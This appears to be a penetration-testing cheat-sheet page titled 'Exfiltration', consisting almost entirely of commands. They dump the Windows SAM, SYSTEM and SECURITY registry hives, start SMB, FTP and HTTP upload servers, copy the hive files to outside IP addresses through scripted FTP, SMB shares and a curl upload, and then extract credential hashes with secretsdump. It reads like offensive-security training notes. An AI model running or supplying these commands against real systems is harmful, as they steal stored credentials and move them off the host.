Exfiltration

Dump the SAM hive to the pwd

reg.exe save HKLM\SAM C:\programdata\sam.bak

Dump the System hive to the pwd

reg.exe save HKLM\SYSTEM C:\programdata\system.bak

Dump the Security hive to the pwd

reg.exe save HKLM\SECURITY C:\programdata\security.bak

Spin up an smb server

impacket-smbserver share share/ -smb2support

echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Exfiltrate data

python3 -m uploadserver

curl -X POST http://HOST/upload -H -F 'files=@file.txt'

OR

python -m pyftpdlib -p 21 --write

echo open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt

ftp -v -n -s:ftp.txt

OR

New-SmbMapping -LocalPath A: -RemotePath \\192.168.229.121\share -TcpPort 8888

net use "\\192.168.171.121\adot8"
copy sam.bak "\\192.168.171.121\adot8\sam.bak"
copy system.bak "\\192.168.171.121\adot8\system.bak"
copy security.bak "\\192.168.171.121\adot8\security.bak"

Dump hashes with secretsdump

secretsdump.py -sam sam.bak -system system.bak -security security.bak local

PreviousCompiling Code NextWindows - Pickle

Last updated 6 months ago